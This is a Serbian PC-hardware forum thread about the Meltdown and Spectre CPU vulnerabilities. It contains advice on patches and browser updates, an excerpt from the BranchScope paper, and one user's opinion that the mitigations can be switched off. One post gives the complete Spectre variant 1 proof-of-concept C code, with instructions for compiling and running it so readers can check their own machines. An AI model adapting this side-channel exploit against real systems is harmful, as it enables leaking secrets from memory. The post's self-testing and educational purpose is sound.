• Apgrejdovali smo forum na XenForo 2.1.1, ukoliko imate predloga vezanih za izgled ili funkcionalnost foruma, ili ukoliko naletite na neki problem, javite nam OVDE

    DEFINISALI SMO PRAVILA FORUMA. Pročitajte ih, pojaviće se automatski kada krenete da čitate nešto!

Meltdown & Spectre

hedgehog

PCAXE Member
Učlanjen(a)
13.12.2014.
Poruka
794
Rezultat reagovanja
6
Moja konfiguracija
CPU & cooler:
AMD FX 4300 Black Edition & FX 8xxx Box poliran XD
Motherboard:
ASRock 970 Pro3 R2.0
RAM:
Exceleram Rippler 2x4GB @1600MHz CL9 1.5V
VGA & cooler:
XFX Radeon 5750 512MB
Display:
Dell P2417H
HDD:
WD Caviar Blue 500GB AAKS 16MB
Case:
Cooler Master Elite 334 Black
PSU:
Corsair VX450W
Optical drives:
Optiarc DVD RW AD-5240S
Mice & keyboard:
GIGABYTE GM-M6880 & CM Suppressor
Internet:
Telekom ADSL 10/1
OS & Browser:
Win7 x64 & Waterfox
Other:
Microsoft LifeCam HD-5000, Nexus 5
Vidim nema ove teme na forumu, pa reko da otvorim.
Dakle za one koji ne znaju/nisu culi Meltdown i Spectre su ranjivosti na CPU koje mogu da omoguće pristup kernel memoriji računara. Ovo uključuje lozinke i druge osetljive informacije. Spectre ne samo da utiče na računare, već i na smartfone i smart home uređaje.
https://gizmodo.com/what-we-know-so-far-about-meltdown-and-spectre-the-dev-1821759062
Uglavnom suma sumarum je da su gotovo svi Intel i pojedini ARM procesori zahvaceni Meltdown i Spectre falinkom, dok su svi Intel, AMD i ARM procesori pogođeni sa Spectre. S tim sto u AMD tvrde da se to odnosi samo na Linux platformu koliko sam procitao do sad.
Microsoft je izbacio neki update koji bi trebalo da otkloni taj propust koliko-toliko, ali pazljivo s njim jer moze da s*ebe OS, zbog "nekompatibilnosti" sa pojedinim antivirus programima.
Meltdown and Spectre: How to Protect Your PC, Mac and Phone Now
Ono sto bi svako trebalo da odradi je update browser-a (Firefox je vec izbacio novu verziju vezanu za ovu problematiku 57.0.4.) kako bi se sprecilo da neki maliciozni softver na taj nacin pristupi rupama.
 

Babadzonka

PCAXE Member
Učlanjen(a)
17.09.2014.
Poruka
678
Rezultat reagovanja
269
Moja konfiguracija
PC / Laptop Name:
tHe
CPU & cooler:
Intel Core i5-4570 + LC-CC-120
Motherboard:
Gigabyte GA-B85M-D2V
RAM:
Patriot 2x4GB 1333Mhz
VGA & cooler:
Sapphire Pulse RX 560 2GB by Tajm Bandit Bouns
Display:
Asus VA24EHE
HDD:
Biostar S100 120GB / Seagate 500GB / Hitachi 320GB
Sound:
Integrated / Intex IT-222 SUF
Case:
Fractal Design Core 3300
PSU:
Seasonic SS-620GB 620W 80+ Bronze
Mice & keyboard:
Logitech MX 518, A4Tech X-718bk / MS Industrial Elite Pro
Internet:
Telekom VDSL 50/8
OS & Browser:
Windows 10 Enterprise LTSB 64bit / Chrome
Other:
Xiaomi Mi 9T, HP LaserJet 1300, Logitech HD C310, A4Tech Bloody G520, Fantech Leviosa MCX01
Izvini ježO :), ali mislim da je ovo pokrenuto vec Intelov "TLB"
 

hedgehog

PCAXE Member
Učlanjen(a)
13.12.2014.
Poruka
794
Rezultat reagovanja
6
Moja konfiguracija
CPU & cooler:
AMD FX 4300 Black Edition & FX 8xxx Box poliran XD
Motherboard:
ASRock 970 Pro3 R2.0
RAM:
Exceleram Rippler 2x4GB @1600MHz CL9 1.5V
VGA & cooler:
XFX Radeon 5750 512MB
Display:
Dell P2417H
HDD:
WD Caviar Blue 500GB AAKS 16MB
Case:
Cooler Master Elite 334 Black
PSU:
Corsair VX450W
Optical drives:
Optiarc DVD RW AD-5240S
Mice & keyboard:
GIGABYTE GM-M6880 & CM Suppressor
Internet:
Telekom ADSL 10/1
OS & Browser:
Win7 x64 & Waterfox
Other:
Microsoft LifeCam HD-5000, Nexus 5
Vidi stvarno je bilo vec nesto u vezi toga. Samo nije nazvano populanim imenom :)
A i ne odnosi se samo na Intel, tice se i ostalih proizvodjaca, bar jedna varijanta Spectre propusta.
Sve u svemu pod hitno nabaciti nove verzije pretrazivaca, jer je javascript jedan od nacina za koriscenje pomenutih rupa. To se osnosi na sve CPU sa Spectre problemom, znaci i AMD i ARM...

EDIT: Nek promeni neko naziv one teme na Topljenje i Avetinju:)
 
Poslednja izmena:

Sam633

PCAXE Addicted
Učlanjen(a)
13.11.2012.
Poruka
1.286
Rezultat reagovanja
26
Moja konfiguracija
Možete proveriti Vaš računar na Spectre propust, ako neko želi.

Treba nam (neki) GCC za Windows.

Ja sam uzeo TDM-GCC, koji možete naći ovde:

TDM-GCC MinGW Compiler

Tokom instalacije, možete uzeti sve što je preporučeno i biće u folderu C:\TDM-GCC-64.

Taj folder sam i izabrao za rad, Vi možete bilo koji drugi.

U njemu napravite novi tekstualni fajl. Desni klik -> New -> Text Document.

Otvorite ga i u njega iskopirajte sledeći sadržaj:

Kod:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "The Magic Words are Squeamish Ossifrage.";

unsigned int edx = 0;

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];
  }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (150) /* assume cache hit if time <= threshold */

int check_rdtscp() {
  __asm__ __volatile__ (
  "movl $0x80000001, %%eax\n"
  "cpuid\n"
  : "=d"(edx)
  :: "%eax", "%ebx", "%ecx"
  );
  return (edx&(1<<27));
}

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2], int has_rdtscp) {
  static int results[256];
  int tries, i, j, k, mix_i;
  unsigned int junk = 0;
  size_t training_x, x;
  register uint64_t time1, time2;
  volatile uint8_t * addr;
  volatile int z = 0;

  for (i = 0; i < 256; i++)
    results[i] = 0;
  for (tries = 999; tries > 0; tries--) {

    /* Flush array2[256*(0..255)] from cache */
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

    /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
    training_x = tries % array1_size;
    for (j = 29; j >= 0; j--) {
      _mm_clflush( & array1_size);
      for (z = 0; z < 100; z++) {} /* Delay (can also mfence) */

      /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
      /* Avoid jumps in case those tip off the branch predictor */
      x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
      x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
      x = training_x ^ (x & (malicious_x ^ training_x));

      /* Call the victim! */
      victim_function(x);

    }

    /* Time reads. Order is lightly mixed up to prevent stride prediction */
    for (i = 0; i < 256; i++) {
      mix_i = ((i * 167) + 13) & 255;
      addr = & array2[mix_i * 512];
      if (has_rdtscp) {
        time1 = __rdtscp(& junk); /* READ TIMER */
        junk = * addr; /* MEMORY ACCESS TO TIME */
        time2 = __rdtscp(& junk); /* READ TIMER & COMPUTE ELAPSED TIME */
      } else {
        time1 = __rdtsc(); /* READ TIMER */
        junk = * addr; /* MEMORY ACCESS TO TIME */
        time2 = __rdtsc(); /* READ TIMER & COMPUTE ELAPSED TIME */
      }
      if (time2 - time1 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */
    }

    /* Locate highest & second-highest results results tallies in j/k */
    j = k = -1;
    for (i = 0; i < 256; i++) {
      if (j < 0 || results[i] >= results[j]) {
        k = j;
        j = i;
      } else if (k < 0 || results[i] >= results[k]) {
        k = i;
      }
    }
    if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
      break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  }
  results[0] ^= junk; /* use junk so code above won’t get optimized out*/
  value[0] = (uint8_t) j;
  score[0] = results[j];
  value[1] = (uint8_t) k;
  score[1] = results[k];
}

int main(int argc, const char * * argv) {
  size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
  int i, score[2], len = 40;
  uint8_t value[2], normalized[1];
  char * recovered = (char*)calloc(len + 1, sizeof(char*));
  const int has_rdtscp = check_rdtscp();

  for (i = 0; i < sizeof(array2); i++)
    array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  if (argc == 3) {
    sscanf(argv[1], "%p", (void * * )( & malicious_x));
    malicious_x -= (size_t) array1; /* Convert input value into a pointer */
    sscanf(argv[2], "%d", & len);
  }

  printf("Reading %d bytes:\n", len);
  while (--len >= 0) {
    printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
    readMemoryByte(malicious_x++, value, score, has_rdtscp);
    printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
    normalized[0] = (value[0] > 31 && value[0] < 127) ? value[0] : (uint8_t)'?';
    recovered[strlen(recovered)] = normalized[0];
    printf("0x%02X=\'%c\' score=%d ", value[0], normalized[0], score[0]);
    if (score[1] > 0)
      printf("(second best: 0x%02X score=%d)", value[1], score[1]);
    printf("\n");
  }
  printf("\n");
  printf(" Original: %s\n", secret);
  printf("Recovered: %s\n", recovered);
  printf("\n");
  return (0);
}
Sačuvajte ga i promenite ime fajla u spectre.c.

Sad nam treba CMD. Pritisnite i držite levi Shift i istovremeno uradite desni klik. Dobićete opciju "Open command windows here". Ili jednostavno otvorite CMD i otiđite do Vašeg radnog foldera.

Kompajlirajte spectre.c sa:

Kod:
gcc -s -msse2 spectre.c -o spectre
ili

Kod:
gcc spectre.c -o spectre
Ako želite x86 verziju, odnosno 32bit-nu verziju, dodajte parametar:

Kod:
-m32
Dobićete u folderu spectre.exe.

Pokrenite spectre.exe u već otvorenom CMD-u, sa:

Kod:
spectre
ili:

Kod:
spectre.exe
Javite rezultat.

Ima još jedan source, ali taj ću postaviti, ako ovaj postavljeni ne radi nekome.

Autor source-a napominje da je TDM-GCC malo buggy, pa ako mislite da može bolje, slobodno preporučite.

Probajte u Linux-u, macOS-u, Windows-u...
 

Sam633

PCAXE Addicted
Učlanjen(a)
13.11.2012.
Poruka
1.286
Rezultat reagovanja
26
Moja konfiguracija
BranchScope:

PDF

As predicted, more branch prediction processor attacks are discovered

12 Concluding Remarks
In this paper we presented BranchScope — a new microarchitectural side-channel attack that exploits directional branch predictor to leak secret data. We demonstrated the attack on recent Intel processors. Our results showed that secret bits can be recovered by the attacker with very low error rate and without the knowledge of the internal predictor organization. Therefore, researchers and system developers have to consider BranchScope as a new security threat while designing future systems. We proposed several countermeasures to protect future systems from BranchScope.
The researchers looked only at Intel processors, using the attacks to leak information protected using Intel's SGX (Software Guard Extensions), a feature found on certain chips to carve out small sections of encrypted code and data such that even the operating system (or virtualization software) cannot access it. They also described ways the attack could be used against address space layout randomization and to infer data in encryption and image libraries.
 

gx-x

Display Guru
Učlanjen(a)
01.04.2009.
Poruka
7.453
Rezultat reagovanja
2.019
Moja konfiguracija
PC / Laptop Name:
Chernobyl
CPU & cooler:
Intel i7 9th gen / LFII 360
RAM:
16gb
VGA & cooler:
Gainward Phoenix 1070Ti
Display:
AOC 27G2U/BK (LF1F)
HDD:
SSD
Sound:
Xonar U5, Monitor Audio, JBL 1202D
PSU:
Enermax Platimax D.F. 1200W
Mice & keyboard:
HyperX Alloy Origins Core + Razer Basilisk
Internet:
SBB kabl
OS & Browser:
Winjdows 10 Pro, FF
ima "[Guru3D]-InSpectre" aplikacija koja moze da proveri da li vam je bloatware protiv ovih navodnih opasnih propusta instaliran i racunar usporen i sa njime ih mozete iskljuciti. Ja iskreno sumnjam da ce neko doci u moj stan, zabosti USB i napasti mi racunar, ili ce me neko preko neta ciljati da mi njuska ram podatke. Tako da sam forsirane zakrpe iskljucio jer kad me za sve ove godine niko nije dirao, nece ni sad. A brzinu HDD-a i SSD-a primecujem vise nego napade na komp (koji se ne desavaju od ove dve vrste exploit-a).
 

Dom1nat0R

PCAXE Addicted
Učlanjen(a)
03.09.2015.
Poruka
12.153
Rezultat reagovanja
6.376
Moja konfiguracija
CPU & cooler:
Intel® Core™ i7-10700K / Arctic Liquid Freezer II 360
Motherboard:
ASUS Maximus XII HERO (WI-FI)
RAM:
G.SKILL tridentZ Black-White 32GB (2x16) DDR4 @3600MHz CL17 [F4-3600C17D-32GTZKW]
VGA & cooler:
ASUS Strix GTX1080-O8G-11GBPS
Display:
LG Ultra Gear 27GN850-B [1ms,144Hz, Nano IPS]
HDD:
Samsung 860 PRO 256GB Samsung 860 EVO 500GB 2x Samsung 860 EVO 2TB WD Red 3TB
Sound:
ASUS Xonar Essence ONE / Cambridge Audio Azur 640A V2 / MA RX2+Pioneer TSW306C / Logitech Z906 [5.1]
Case:
Thermaltake Suppressor F51 [Window]
PSU:
Cooler Master V850 [Full modular]
Optical drives:
N/A
Mice & keyboard:
ASUS ROG Gladius II / ASUS ROG Claymore [MX Brown] / Headset hyperX Cloud Alpha
Internet:
Optical fiber 350mbs/110mbs
OS & Browser:
Windows 10 Enterprise 64bit / Google Chrome
Other:
PlayStation 4 PRO CUH-7216B / TV Samsung UE50RU7022 50" 4K
Izvor gospodin Vladimir Pejić
 
Vrh